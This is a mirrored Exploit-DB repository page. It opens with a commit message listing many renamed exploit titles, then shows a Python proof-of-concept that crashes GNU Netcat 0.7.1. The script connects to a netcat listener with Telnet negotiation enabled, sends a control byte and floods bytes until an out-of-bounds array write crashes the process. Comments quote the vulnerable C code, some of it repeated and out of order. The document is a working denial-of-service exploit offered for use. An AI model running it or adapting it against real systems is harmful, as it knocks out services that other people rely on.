bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/dos/40866.py
Offensive Security 855e59f932 DB: 2016-12-07 
9 new exploits

MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)
Asterisk - (SIP channel driver / in pedantic mode) Remote Crash
Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)
Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash

F5 BIG-IP - Remote Root Authentication Bypass (1)
F5 BIG-IP - Authentication Bypass (1)

Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow
NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow

NetCat 0.7.1 - Denial of Service
Microsoft Event Viewer 1.0 - XML External Entity Injection
Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection
Apache CouchDB 2.0.0 - Local Privilege Escalation

Samba 2.2.8 - Remote Root Exploit
Samba 2.2.8 - Remote Code Execution

Microsoft Windows - WebDAV Remote Root Exploit (2)
Microsoft Windows - WebDAV Remote Code Execution (2)

Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav)
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)

miniSQL (mSQL) 1.3 - Remote GID Root Exploit
miniSQL (mSQL) 1.3 - GID Remote Code Execution
Real Server 7/8/9 (Windows / Linux) - Remote Root Exploit
GtkFtpd 1.0.4 - Remote Root Buffer Overflow
Real Server 7/8/9 (Windows / Linux) - Remote Code Execution
GtkFtpd 1.0.4 - Buffer Overflow
Solaris Sadmind - Default Configuration Remote Root Exploit
Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit
Solaris Sadmind - Default Configuration Remote Code Execution
Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution

ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit
ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution

ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / Brute Force Exploit
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force

Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit
Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution

Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit
Ethereal 0.10.0 < 0.10.2 - IGAP Overflow
Monit 4.1 - Remote Root Buffer Overflow
Monit 4.2 - Remote Root Buffer Overflow
Monit 4.1 - Buffer Overflow
Monit 4.2 - Buffer Overflow

INND/NNRP < 1.6.x - Remote Root Overflow
INND/NNRP < 1.6.x - Overflow Exploit

LPRng (RedHat 7.0) - lpd Remote Root Format String
LPRng (RedHat 7.0) - 'lpd' Format String

BeroFTPD 1.3.4(1) (Linux/x86) - Remote Root Exploit
BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution
BIND 8.2.x - (TSIG) Remote Root Stack Overflow (1)
BIND 8.2.x - (TSIG) Remote Root Stack Overflow (2)
BIND 8.2.x - (TSIG) Remote Root Stack Overflow (3)
BIND 8.2.x - (TSIG) Remote Root Stack Overflow (4)
BIND 8.2.x - (TSIG) Stack Overflow (1)
BIND 8.2.x - (TSIG) Stack Overflow (2)
BIND 8.2.x - (TSIG) Stack Overflow (3)
BIND 8.2.x - (TSIG) Stack Overflow (4)

HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit
HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution

CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Root Exploit
CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow

Solaris /bin/login (SPARC/x86) - Remote Root Exploit
Solaris /bin/login (SPARC/x86) - Remote Code Execution

Drcat 0.5.0-beta - (drcatd) Remote Root Exploit
Drcat 0.5.0-beta - 'drcatd' Remote Code Execution

Dropbear SSH 0.34 - Remote Root Exploit
Dropbear SSH 0.34 - Remote Code Execution

Apple Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow
Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution

Monit 4.2 - Basic Authentication Remote Root Exploit
Monit 4.2 - Basic Authentication Remote Code Execution

WvTFTPd 0.9 - Remote Root Heap Overflow
WvTFTPd 0.9 - Heap Overflow

Qwik SMTP 0.3 - Remote Root Format String
Qwik SMTP 0.3 - Format String

Citadel/UX 6.27 - Remote Root Format String
Citadel/UX 6.27 - Format String

Knox Arkeia Server Backup 5.3.x - Remote Root Exploit
Knox Arkeia Server Backup 5.3.x - Remote Code Execution
Smail 3.2.0.120 - Remote Root Heap Overflow
mtftpd 0.0.3 - Remote Root Exploit
Smail 3.2.0.120 -  Heap Overflow
mtftpd 0.0.3 - Remote Code Execution

dSMTP Mail Server 3.1b - Linux Remote Root Format String
dSMTP Mail Server 3.1b (Linux) - Format String Exploit

IPSwitch IMail Server 8.15 - IMAPD Remote Root Exploit
IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution

linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit
linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution

MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow
Alt-N MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow

GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit
GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution

ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit
ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution

dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow
dproxy-nexgen (Linux/x86) - Buffer Overflow

Kerberos 1.5.1 - Kadmind Remote Root Buffer Overflow
Kerberos 1.5.1 - Kadmind Buffer Overflow

webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield)
webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution

VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit
VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution

MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow

Sun Solaris 10 - rpc.ypupdated Remote Root Exploit
Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution

ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Root Exploit
ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution

Sun Solaris 10 - rpc.ypupdated Remote Root Exploit (Metasploit)
Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)

Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)
Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)

Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit
Solaris 9 (UltraSPARC) - sadmind Remote Code Execution

Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution
Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution

Microworld eScan AntiVirus < 3.x - Remote Root Command Execution
Microworld eScan AntiVirus < 3.x - Remote Code Execution

AIX5l with FTP-Server - Remote Root Hash Disclosure
AIX5l with FTP-Server - Hash Disclosure

McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)
McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Remote Code Execution)

ProFTPd 1.3.3c - Compromised Source Remote Root Trojan
ProFTPd 1.3.3c - Compromised Source (Trojan) Remote Code Execution

Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit
Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution

MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)
Alt-N MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)

ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution
ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution

DreamBox DM800 1.5rc1 - Remote Root File Disclosure
DreamBox DM800 1.5rc1 - File Disclosure

TelnetD encrypt_keyid - Remote Root Function Pointer Overwrite
TelnetD encrypt_keyid - Function Pointer Overwrite
F5 BIG-IP - Remote Root Authentication Bypass (2)
MySQL - Remote Root Authentication Bypass
F5 BIG-IP - Authentication Bypass (2)
MySQL - Authentication Bypass

ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection
ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection

WIDZ 1.0/1.5 - Remote Root Compromise
WIDZ 1.0/1.5 - Remote Code Execution
Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities
Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)
DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow

proManager 0.73 - (note.php) SQL Injection
ProManager 0.73 - 'note.php' SQL Injection

pNews 1.1.0 - (nbs) Remote File Inclusion
pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion

Power Phlogger 2.0.9 - (config.inc.php3) File Inclusion
Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion

eFiction 3.1.1 - (path_to_smf) Remote File Inclusion
eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion

FlexPHPNews 0.0.5 - (news.php newsid) SQL Injection
FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection

Achievo 1.1.0 - (atk.inc config_atkroot) Remote File Inclusion
Achievo 1.1.0 - 'config_atkroot' Parameter Remote File Inclusion

SimpNews 2.40.01 - (print.php newnr) SQL Injection
SimpNews 2.40.01 - 'newnr' Parameter SQL Injection

PHPNews 0.93 - (format_menue) Remote File Inclusion
PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion

meBiblio 0.4.5 - (index.php action) Remote File Inclusion
meBiblio 0.4.5 - 'action' Parameter Remote File Inclusion

Joomla! Component rapidrecipe 1.6.5 - SQL Injection
Joomla! Component Rapid Recipe 1.6.5 - SQL Injection

mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting
pLog - 'albumID' SQL Injection
smeweb 1.4b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
PLog 1.0.6 - 'albumID' Parameter SQL Injection
smeweb 1.4b - SQL Injection / Cross-Site Scripting

Joomla! Component joomradio 1.0 - 'id' SQL Injection
Joomla! Component JoomRadio 1.0 - 'id' Parameter SQL Injection

Battle Blog 1.25 - (comment.asp) SQL Injection
Battle Blog 1.25 - 'comment.asp' SQL Injection

1Book Guestbook Script - Code Execution
1Book Guestbook Script 1.0.1 - Code Execution
PHP-Address Book 3.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Joomla! Component EasyBook 1.1 - (gbid) SQL Injection
427bb 2.3.1 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting
Joomla! Component EasyBook 1.1 - 'gbid' Parameter SQL Injection
427bb 2.3.1 - SQL Injection / Cross-Site Scripting
Power Phlogger 2.2.5 - (css_str) SQL Injection
pSys 0.7.0.a - (shownews) SQL Injection
Joomla! Component JoomlaDate - (user) SQL Injection
Power Phlogger 2.2.5 - 'css_str' Parameter SQL Injection
pSys 0.7.0.a - 'shownews' Parameter SQL Injection
Joomla! Component JoomlaDate 1.2 - 'user' Parameter SQL Injection
JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection
phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Joomla! Component yvcomment 1.16 - Blind SQL Injection
JiRo's FAQ Manager eXperience 1.0 - 'fID' Parameter SQL Injection
phpinv 0.8.0 - Local File Inclusion / Cross-Site Scripting
Joomla! Component yvComment 1.16 - Blind SQL Injection

BrowserCRM 5.002.00 - (clients.php) Remote File Inclusion
BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion

Joomla! Component rapidrecipe - SQL Injection
Joomla! Component Rapid Recipe 1.6.6/1.6.7 - SQL Injection

Joomla! Component iJoomla! News Portal - 'itemID' SQL Injection
Joomla! Component iJoomla News Portal 1.0 - 'itemID' Parameter SQL Injection
real estate Web site 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
telephone directory 2008 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ASPilot Pilot Cart 7.3 - (article) SQL Injection
real estate Web site 1.0 - SQL Injection / Cross-Site Scripting
Telephone Directory 2008 - SQL Injection / Cross-Site Scripting
ASPilot Pilot Cart 7.3 - 'article' Parameter SQL Injection
Flux CMS 1.5.0 - (loadsave.php) Arbitrary File Overwrite
pNews 2.08 - (shownews) SQL Injection
Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite
pNews 2.08 - 'shownews' Parameter SQL Injection
ErfurtWiki R1.02b - (css) Local File Inclusion
DCFM Blog 0.9.4 - (comments) SQL Injection
yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Insanely Simple Blog 0.5 - (index) SQL Injection
ASPPortal Free Version - 'Topic_Id' SQL Injection
Experts 1.0.0 - (answer.php) SQL Injection
SyndeoCMS 2.6.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
ErfurtWiki R1.02b - Local File Inclusion
DCFM Blog 0.9.4 - SQL Injection
Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection
Insanely Simple Blog 0.5 - SQL Injection
ASPPortal Free Version - 'Topic_Id' Parameter SQL Injection
Experts 1.0.0 - 'answer.php' SQL Injection
SyndeoCMS 2.6.0 - Local File Inclusion / Cross-Site Scripting

Yuhhu 2008 SuperStar - 'board' SQL Injection
Yuhhu 2008 SuperStar - 'board' Parameter SQL Injection

eFiction 3.0 - (toplists.php list) SQL Injection
eFiction 3.0 - 'toplists.php' SQL Injection

pSys 0.7.0 Alpha - (chatbox.php) SQL Injection
pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection

pNews 2.03 - (newsid) SQL Injection
pNews 2.03 - 'newsid' Parameter SQL Injection

Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection
Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection

FlexPHPNews 0.0.6 & PRO - (Authentication Bypass) SQL Injection
FlexPHPNews 0.0.6 & PRO - Authentication Bypass

E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities
E-ShopSystem - Authentication Bypass / SQL Injection

Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload
Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload

427BB Fourtwosevenbb 2.3.2 - SQL Injection
427BB 2.3.2 - SQL Injection

Joomla! Component 'com_joomradio' - SQL Injection
Joomla! Component JoomRadio 1.0 - SQL Injection

Joomla! Component 'com_elite_experts' - SQL Injection
Joomla! Component Elite Experts - SQL Injection

ASPilot Pilot Cart 7.3 - newsroom.asp SQL Injection
ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection

Contrexx ShopSystem 2.2 SP3 (catId) - Blind SQL Injection
Contrexx ShopSystem 2.2 SP3 - 'catId' Parameter Blind SQL Injection

Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit
Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit

alt-n mdaemon free 12.5.4 - Persistent Cross-Site Scripting
Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting

SimpNews 2.0.1/2.13 - PATH_SIMPNEWS Remote File Inclusion
SimpNews 2.0.1/2.13 - 'path_simpnews' Parameter Remote File Inclusion

PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion
PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion
PHPSysInfo 2.0/2.3 - 'index.php' sensor_program Parameter Cross-Site Scripting
PHPSysInfo 2.0/2.3 - system_footer.php Multiple Parameter Cross-Site Scripting
PHPSysInfo 2.0/2.3 - 'sensor_program' Parameter Cross-Site Scripting
PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting

Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure
Seowonintech Routers fw: 2.3.9 - File Disclosure

PHPNews 1.2.x - auth.php SQL Injection
PHPNews 1.2.x - 'auth.php' SQL Injection
efiction 1.0/1.1/2.0 - titles.php let Parameter Cross-Site Scripting
efiction 1.0/1.1/2.0 - titles.php let Parameter SQL Injection
efiction 1.0/1.1/2.0 - viewstory.php sid Parameter SQL Injection
efiction 1.0/1.1/2.0 - viewuser.php uid Parameter SQL Injection
efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting
efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection
efiction 1.0/1.1/2.0 - 'sid' Parameter SQL Injection
efiction 1.0/1.1/2.0 - 'uid' Parameter SQL Injection

427BB 2.2 - showthread.php SQL Injection
427BB 2.2 - 'showthread.php' SQL Injection

BrowserCRM - results.php Cross-Site Scripting

Simpnews 2.x - Wap_short_news.php Remote File Inclusion
Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion

ZYXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting
ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting
Yblog - funk.php id Parameter Cross-Site Scripting
Yblog - tem.php action Parameter Cross-Site Scripting
Yblog - uss.php action Parameter Cross-Site Scripting
Yblog - 'funk.php' Cross-Site Scripting
Yblog - 'tem.php' Cross-Site Scripting
Yblog - 'uss.php' Cross-Site Scripting
Simpnews 2.x - admin/index.php Unspecified Cross-Site Scripting
Simpnews 2.x - admin/pwlost.php Unspecified Cross-Site Scripting
Simpnews 2.x - 'index.php' Cross-Site Scripting
Simpnews 2.x - 'pwlost.php' Cross-Site Scripting

PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities
PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting
Insanely Simple Blog 0.4/0.5 - 'index.php' current_subsection Parameter SQL Injection
Insanely Simple Blog 0.4/0.5 - Blog Anonymous Blog Entry Cross-Site Scripting
Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection
Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting
SimpNews 2.41.3 - admin/layout2b.php l_username Parameter Cross-Site Scripting
SimpNews 2.41.3 - comment.php backurl Parameter Cross-Site Scripting
SimpNews 2.41.3 - 'l_username' Parameter Cross-Site Scripting
SimpNews 2.41.3 - 'backurl' Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - modules/Documents/version_list.php parent_id Parameter SQL Injection
BrowserCRM 5.100.1 - modules/Documents/index.php contact_id Parameter SQL Injection
BrowserCRM 5.100.1 - Multiple Script URI Cross-Site Scripting
BrowserCRM 5.100.1 - license/index.php framed Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - licence/view.php framed Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - pub/clients.php login[] Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - 'index.php' login[] Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - 'parent_id' Parameter SQL Injection
BrowserCRM 5.100.1 - 'contact_id' Parameter SQL Injection
BrowserCRM 5.100.1 - URI Cross-Site Scripting
BrowserCRM 5.100.1 - 'framed' Parameter Cross-Site Scripting
Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection
BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting
BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting
2016-12-07 05:01:17 +00:00

78 lines
2.4 KiB
Python
Executable file
Raw Blame History

#/usr/bin/python
#-*- Coding: utf-8 -*-
### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ###
# Date: 2016-11-19
# Exploit Author: n30m1nd
# Vendor Homepage: http://netcat.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
# Version: 0.7.1
# Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux
# Credits
# =======
# Props to Giovanni and Armando creators of this useful piece of software, thank you guys!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better. See you at AWE!
# How to
# ======
# * Get a distribution that ships with gnu netcat or Compile netcat from sources:
# * # Download
# * tar -xzf netcat-0.7.1.tar.gz
# * cd netcat-0.7.1/
# * ./configure
# * make
# * # Netcat will be deployed in src/netcat
#
# * Set netcat to listen like the following:
# * ./netcat -nlvp 12347 -T
# * Just run this script on a different terminal
#
# Why?
# ====
# When the Telnet Negotiation is activated (-T option), Netcat parses the incoming packets looking for Telnet Control Codes
# by running them through buggy switch/case code.
# Aforementioned code fails to safely check for array boundaries resulting in an array out of bounds write.
# Vulnerable code
# ===============
# telnet.c
# ...
# 76 static unsigned char getrq[4];
# 77 static int l = 0;
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
# ...
# 88 /* loop all chars of the string */
# 89 for (i = 0; i < ref_size; i++) {
# 90 /* if we found IAC char OR we are fetching a IAC code string process it */
# 91 if ((buf[i] != TELNET_IAC) && (l == 0))
# ...
#100 getrq[l++] = buf[i]; // BANG!
# 99 /* copy the char in the IAC-code-building buffer */
# ...
# 76 static unsigned char getrq[4];
# 77 static int l = 0;
# 78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
# Exploit code
# ============
import socket
RHOST = "127.0.0.1"
RPORT = 12347
print("[+] Connecting to %s:%d") % (RHOST, RPORT)
s = socket.create_connection((RHOST, RPORT))
s.send("\xFF") # Telnet control character
print("[+] Telnet control character sent")
print("[i] Starting")
try:
i = 0
while True: # Loop until it crashes
i += 1
s.send("\x30")
except:
print("[+] GNU Netcat crashed on iteration: %d") % (i)
Reference in a new issue View git blame Copy permalink